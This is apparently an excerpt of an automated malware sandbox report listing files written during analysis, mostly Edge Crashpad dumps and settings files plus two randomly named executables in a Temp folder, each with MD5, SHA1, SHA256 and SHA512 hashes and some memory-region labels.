SHA1 9da7fcd8a90a51c230acb8e3fa0e268b8c5645e5
SHA256 1d7c6443100b0ce8992eee59e450856cff76a7f373c825873b0287a88e98467d
SHA512 36985e53efdc908e4ccf453e4b7d275d6182d5303b8f43dff7b37f1c07e474221daa950ac5a0d585258f0a5724d160f4d9abd618aa26c268a2d28ddf2a6b9507

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\f6845ed5-8056-47ab-ac6c-d1f8b98c1386.dmp

MD5 956bccf2ea0d485366af7ddd75057aaa
SHA1 0191bcee1a307b9fe2a4355af081f3e106b23306
SHA256 339e428879adeaad8abff8ba7c7c5402840f74a5ad7c813e08799177ab03fda9
SHA512 ae5bef3782b72025d87d6eff9f15849d52b29bde67a80460a83bf234c087c2685d5b1c0694e2a9e2aa4798d36f3969afdd247a007c22ed20233c93e98a412511

memory/212-3636-0x0000000000AE0000-0x00000000011DE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\e905ed3a-bc7d-48a2-b33d-80027ac6ec3d.dmp

MD5 61eec5b1160f6190555b61be857661ac
SHA1 370d0526dfe48fce57c88e163c12464840b527f0
SHA256 dbce607c3c99d259f047549faad872d7202fcb970faeab3d33291e8006f9cd45
SHA512 4ab4087e4da32dd7347ce37423c1e75fd11bf52b30a156df68cdfd87b703f0294756d762a2db2bdb9a0f17d2f72c1f288990b47bf0198180509a7c7efe5c87c0

memory/440-3725-0x0000000000600000-0x000000000101D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0703c230429c1601b1cd90e727336c2c
SHA1 7c7bcc5e3b84902495dcc3be55f4ddd284067309
SHA256 66acb597243489d7e93b8c419153b6503c7ab66f7a67b4df1e5646f8ef84b681
SHA512 c5e7faf4e1a2b038a204b9ab3bf42939faeb13bcd78ad2e8c7be6c84a41c53f1a262a2fe9e4aae86d8002a695abe49c928f42e19c31622d366777f0b3fa44652

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 1f4fc60d23d1fd06142f3d06afb3987e
SHA1 1790cf1541dc3bce2114375e8bfb8c86294d1580
SHA256 ae3c749058f2a6955b47ea008c0c9ac58e29b55553aeab511d8eaeebf12bd9f5
SHA512 558775bbf3270ec0805b56033ac90a962d91e65e5ee4040efbec9dc05a5755feb892883192f07f9b4f5d84f00415330bd052701bb7dd203507b2d2e8898b2a4d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\df1bd53c-8464-431f-a2e8-1ed754ef88e7.dmp

MD5 dc2cf9e2fcc2825d1362466b13d06302
SHA1 c204a2c3c207bb4581860894283fca9404908461
SHA256 9ad96cff894df31b7bcbe4ce3157ae6e2d1193ff8947c58bb20f75c7559a27b3
SHA512 90123871f673e85f7ec3ed9387df8b1e95dd9f04c853151a4a0169a9d0fbd95bffaf2b83be9a6b90a35a4795851bf927e0052fd2687163e6616ccadeea69427c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 9940df12770cbd801919aacef3a22222
SHA1 2239ac71898766530fc23a408051e985afe26708
SHA256 d5eb948adef8b2e1a573a94075071378608d8a2ff2337542c87c45fac2be83db
SHA512 c5d722775f2f11c122210c770836c96869e583c623b06ce0c962acb89a473c065642f7b1cafc7817a9cd7cf9b64795714b9af46714ed9e7dea037d27a078c96c

memory/440-3775-0x0000000000600000-0x000000000101D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 3eea2b6dfbc08cf4feba4a61fa0d85b4
SHA1 5fd5aab213b10c63684e9cb22789bc38a2e295e5
SHA256 c2517d06813f19e489e81e15bde73dd10cbeffad3892a3b270e9f0a8f201694f
SHA512 31f6aa1ec50d6b62ffa050128c8ce06f586c4cd19c84f783fe491c152c0be14bec69eff7595cbd942761d79c167fc7a058b7223473f0948eac573cb867822b70

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\3e25bbf1-135b-4913-901b-93e504394bbf.dmp

MD5 61058976516cfd3b7b6b2d660c83378f
SHA1 6a9455c2a55fff8fd5f3093910533fa458e956f6
SHA256 3f411187f543516f31d80de8eb810dd18150d5de5ec1bbef115b72763533422e
SHA512 57cf490373900e67547972806de26c0c449091db2917da1339ccb86630b769682f066b93d15fc846e5dd35db665d6f9b1e16195a33cce6b5d8dc28e23d48fe9a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e29632985ad43efb294e2abd06edc561
SHA1 4de0380e341a5ba75889794c0d0876d8f83e4f07
SHA256 4ba1d4b4b56321ff7377ebb9f19fc6117f1182bc3dc4296ed340a8d2a3b88ba5
SHA512 67e47112f0ff2219ad82cb3925bbbe18e8434f61dea80eddb08e3bc6f013ce59baa1f8b4efc6657d54dae5963781a3ff4411cc3d6018afa2bbd9544916bb1642

C:\Users\Admin\AppData\Local\Temp\10109730101\8d18e96742.exe

MD5 bf2c3ece85c3f02c2689764bbbe7984e
SHA1 8a3c1ac9a42a7ec56c83f4362b28ae5a16a7c9d7
SHA256 6b2b85a6a3da80835e756d7746d0ce6d55eba35500264165f854dcd79fc18d17
SHA512 466a9d05c83e21809bcce8df8e406a44972ba439faa0e7dc1aec9142c8e2b499aa2f808a7f19b81b29e88fa09086ea89932d989e86e294c2be15a6a8bdf36b0f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 6d0e58cffe58473490e517c4e46f16ce
SHA1 bb8d68c4f4f33a5b71b4f296e3361d9146f98013
SHA256 fab2003db844f65ad09719b981898058e906758b0836e12ff7d42dc030672d60
SHA512 4eedf942035ded26b65e295ff3971f1c439ec9b23de9d172f47ae2b5b85c17a9f22cf8acbfe8890f85c162fa2ad4507f52bab5a3be1395b6d5125a6b295b3040

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\35eb6b54-39bf-4d83-86f2-73cb027b602b.dmp

MD5 b7d3845faea2e35273ca17cc73e644a7
SHA1 50866c8a44bd43531c79ad93019aeaa5eeda6440
SHA256 9aac1cb7c1294e995a41d1bde774088285cf6797f69ca78b36188134380dcfa9
SHA512 6ffde601c2ddce29170a9e53fb7d7585bafde4b224251427ce80b5effe6d9beb10a7bccbd58debe4fe843e877ebf4319840c510fade1097ad995b0330f5e0f8b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8000573781439bf4d0b3400962fe5af9
SHA1 74f665cd5f55de42cbbaa73523d827e1e381d006
SHA256 389ea040fe3fa25a88ff929e437eaec6eb57c372c2dc52953d01c85760701aa5
SHA512 87f646d3389a01faf2605cc24c7a6f1794bf878e977239271427fabe26784a95cd62e000fdd6ad5f542b28351e79367a399bf94a1973d59424a05a80bdae1a79

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\7c7ab717-58a0-48b3-87c5-895f5298e7bd.dmp

MD5 7145b301b61a68bf96b8db56dc286d96
SHA1 a89509185c78dd4f6d46c823ed4c30065a2e8f6b
SHA256 4814f648e9c13dbc11ae84acc8598c9ac5c6dbed738b5c1458ce7231c86c9229
SHA512 ff5c1388029295ef5c52a5d3802e1febfbaac1b1a24c09f8cebdfbbd5ed984c7df65f283ca12d2a48f926cdddad0d26b36ef5bf54987c0976561abe417284192

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\8343b2b1-82b4-47c7-9505-29f8d95557c7.dmp

MD5 7bf5daf508d0b289d41bd52195feaa60
SHA1 207a83c42fb6a92a55af2b6a77001ff6624cf50e
SHA256 d4f2498939776f794d3fa84f76196b1d2f1223e199ae5a06490d219541cb57f5
SHA512 b6f98e17e559eae319324a1f9f0ed856f9239c00de3a9888d248310ad33cf92f88874f56cfb4aa106e9a27316317face95f18745c528cb011b6d7eccd7085dd8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 32bd74eeb83aef72b12a01becfbbb5ee
SHA1 dfb4ddc5baf9548d55831b1274daf69382eb5a0b
SHA256 6d0eefc90a53d5f0d9351fdde67c428a0de5f97b07b9025e53eb1fb7b879a5a6
SHA512 e6d5703c7c5171f7ed96c226d6fc03b88501812338b0d61b3086014a2160470aba73b897e1e2adf6bc60c54ad5783cb24f84ac176e745197d165792c097a53eb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 59a5edc8893304cc087bcfcb6e4519c0
SHA1 c8968caba31a10c5002f45bf26873e1a8d05cc04
SHA256 2868574334e514ce0a1c5097912efe6bf8926d368f1b1f6028b70764ccb9f219
SHA512 4e07e62e37c5dba80380e9999ef38f3bf3ed59a62082c91753da62e51e155d125377904dd012790f1b9120aeaff6d04ea2d7528975ba4aa2842508b97b870e6a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ce8962cc-0f52-497d-8432-733b012b2af4.dmp

MD5 757b1ba87c817a470c6e687263d242d4
SHA1 7e2e693d0856b2db09a56be0d021899f5c493d85
SHA256 55523128989fe8d63da254c6c8e01c34fb783b10ec3c70984d9407e41feef8e0
SHA512 2aa014cc68b27af092027c4926d6ea64da35785568f0c48615cf3c4af50f7d082d061c93fa6a0476a5afcc105f4854122fb752f3fdb1f6eca54f2f3d90c1b8dd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 af5d5c73ac6e536c6ef8e20170f2fba6
SHA1 f1ca17f5116576a45cb66bb9166145a047126514
SHA256 6511dcc97e32c50ed018c3a7327883cdd958b7a2a7f80c6c9a2868209fead29f
SHA512 dfdc48a0fe3a8db808db2da4613510a1f2a5fdb4168e3d0a918158d81fa5e02ae40bd1fe61a8dc0cd70aef8e28ba899e185accd56cfe9dd2953efc21a99b9012

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\75a28aa7-8423-498c-b2e8-7635fa3c5649.dmp

MD5 bdba6faeb92665d67a0d66be6cf44bb9
SHA1 4522b9cbbd4a5f565500e90785b3c9bb0f15868e
SHA256 190e00cf10c59b57142996dc3c8aa20b829e44ec544d1fb2eaa57bad62247e2c
SHA512 c5909d21457a1b35132b11eeed671ab5e1d35ac5e3eb12b00883a625c9b9d7e9c6025819dfc9556516c595815913c03aacf32dfccca8c0955fd24b14251abe2f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 0c04731c821836f09631c69ed42eb195
SHA1 6941959ce845853a0d13673e531a7a1d80a410b0
SHA256 c250ea3ecf88e55f38bfcb053ffc7cb94fa8096687808b8aadf0c69016907788
SHA512 b44b65eb68418e7a0a3e7f85cb6d236daf14119d1e6e96a47eb13deb5b09d330fa94455e21e1321999fb104ec1e2674ad04c64751ede8f8255dcea3efb363305

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 37e49d3c08c3f0b1ee8b36646e229aed
SHA1 e65cc09c4e035bafafdb08679543900570831ce1
SHA256 467d3a094e1dad6c2494f9427efbe2b624dfbce139308cccf0f5f91ac30956b9
SHA512 38cf2ee531758772eb02da3cf1206dd6cf5a154fbebf7377aba8fc2ba927446961867e6e5b2cc8431a381dc92cfef8f5ab325fa7840c843341bdf0c7668d0423

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\cc124ae6-39d7-4041-a6b5-e96e3fede0f8.dmp

MD5 941c01a4dbdf4dbd2005403b21e7426c
SHA1 db0ecbdcccd8607c3ed7ca3c986f8b7d803952f9
SHA256 d4db86892cc376a833bb367c5436b97de60b0b98edd02ac0fbb42ab6f3aa8ef4
SHA512 363d40e39d67d12d05b961c3104f2a8217bf7d968d9bc0fe238afe32ae7104cb509a869a1ded1c7989aa4054977ef33acec7a6923617951e98161e929353da65

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 19429fd2d8c3fa6931edf05de9738bfd
SHA1 6e1aed284fdc45858c0f019c31f7117735a5c59a
SHA256 7b6b60177558eac11247419a775fe7ff081e41c81c5f4691856d39cad24391a2
SHA512 8a442d7b6d961a323bedd2d3ccb4a88094f731804a578a3cb8fccc98a04c8e41bc9dca65f3924ae08425942eb7261d1e546c031bb0a0edbcfe1ba0e8f8339a18

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\1bd3a6cf-94fc-42ca-ae47-20df9e77a9df.dmp

MD5 70acc7f3e934c0c9b133cc1659ad68a6
SHA1 bff961362223b9ca4047fc9b2b11f77d413c8bd5
SHA256 c535522629c66c538e0f938dae0a656d8cc9bb32bca3a58ba0684ff042165004
SHA512 57cc31709c87c7405329f8ae692b0d4e7d7c7205168d0e9305cab65cea6544b67dd78ad0bd6ca3bf9f5e0361f9cb36dedeebd6ec368957008ee1f1c241df958c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 cc88362d282034921cc083139da012fa
SHA1 28201b593107d7fb77b36b31761e5a1e2d428931
SHA256 c66b01c252dc06c0e9a88eb496ec730890bf09c440e6c0719206002e8cbc2e78
SHA512 1943ae37de76814dd452ba2b9d6530624eb7cb456f993cf787b3bf937027dcb0e3bab2f8b980f78d674385764b3e2312f0421fb83a9da662abc7b0eae19450e0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\248fdb21-92af-468c-aa65-cacf12729322.dmp

MD5 e3b1db5445f6e4504241863fd886fdf3
SHA1 f64383d84cf2eb86926ceb9ebb71d96cd4d189b4
SHA256 6b42303b5a7401b4655f08af56e1efbcdaf3b231b89f734f6c9a85cbcc6f210e
SHA512 c2071ae345ee1cf5ab6f06597044a61c3c3c5599fe3c11697366bf2920fcd896aecc013135f8d0ae249db176d3b15f6c698f5f9d7f95856969f6f515b731f984

C:\Users\Admin\AppData\Local\Temp\10109740101\1e6d93a433.exe

MD5 fc391f3ed7914ec9b2f19092f104a997
SHA1 4aedc18e2be52e4fb7ccfbd1e2747fb33eeb7714
SHA256 11d9585b221548c57c1f60eecbebbaf46d98324ac22946a3022a25c6e148a7fe
SHA512 bb4bf1961dc53e7514f712bee8f770f4ef7c382e9a75cd80dff305a8593884cc5aae9fc389c9c321ec238fe0807b8597536bb78b19bbf8cbca4c9bdd61e94a05

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 6dd25339d4a95ac39c150cf3698bdb32
SHA1 f7e52ab0d2def4831967996c1bdbf1a85016482c
SHA256 1da7bc7593807e6fcae24a9938d221c8b01e655c1d6931cc9d9fec1f7f64ce3e
SHA512 9b93530df6a30ec077db3bdb70ecbd5496f842a96459522cd121a00edd3dace4365e8d08009eebec3f1c235a98d2a58398f7f8245c3927631c4547cfb51e88b5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\0db3d1c0-9043-47ec-a72d-97db18e785e7.dmp

MD5 c1efe0bdaabc6a9456fcc82c1f4607cb
SHA1 641d18442ba045d09f791feeeed345c7758359e0
SHA256 6e80133e9f2a8a7288f0f0b1082f793086a96cfbe31e6dc3bce822e0ffe09a32
SHA512 c4ff620a5dfc799e3bb580b0a6763b1c1a9e4ad43778c7bcfa986e1d123be56a534d5fa812ac828d389afd02195c1057531f320886d2e9cdd6ffe86ff5785447

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 30c07605cfc62e4b8c8c7e58d27d5cb9
SHA1 c6d0c9f0436f044a4ad8ea65a5e2f8fb347072f5
SHA256 79fb82d0043b967e92d6f54d76b90d1ceca8f5eb7e8aa29f64dcab06819dabf3
SHA512 2a5cd29ca4fc610039a35fc53763a4cffcf4c158301c4ff1268e5455b108beedfe6f3fd367f7069d3d21e7e1e809ab3d9df76a97bdf84c48c6201ca31b37f8eb

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\PFMTXXPF\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 ba69d55af5fbe8837fe322fec5e08ad1
SHA1 084de460a255db50284da615b9f0d08195e6a035
SHA256 651bd0d4e45b26b0b1f4059e4d04947f4061e2be98157867ceccdbb659b8ed85
SHA512 4b62b97d044e9db0076e772d772275b3730d17cc477463df5f989c7271ff634a6b3eef7793113e7c35274c22c59603ee8506e0b21ed56d210374a9de95aeb89a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\f4c42a32-3fa4-48e9-9605-9209ba9baef2.dmp

MD5 de2fab2b08b88619acea67ebc0c2aa79
SHA1 2a5935adcdce9f6ee0dd5e9df7bbdddedfb5e97e
SHA256 bc03f0cfb983bcf6402b08819bfe0193ac80a7c0f0b43eb0c115cde87c0aa4ee
SHA512 13b62f9ec3978a78716acf43c7599a2e08e398f625f2748caca1aeeb00cefb08bb65a0d2216c41c504441156037e34d7ba18ca407c29dd66a8d05e24a5c9cab3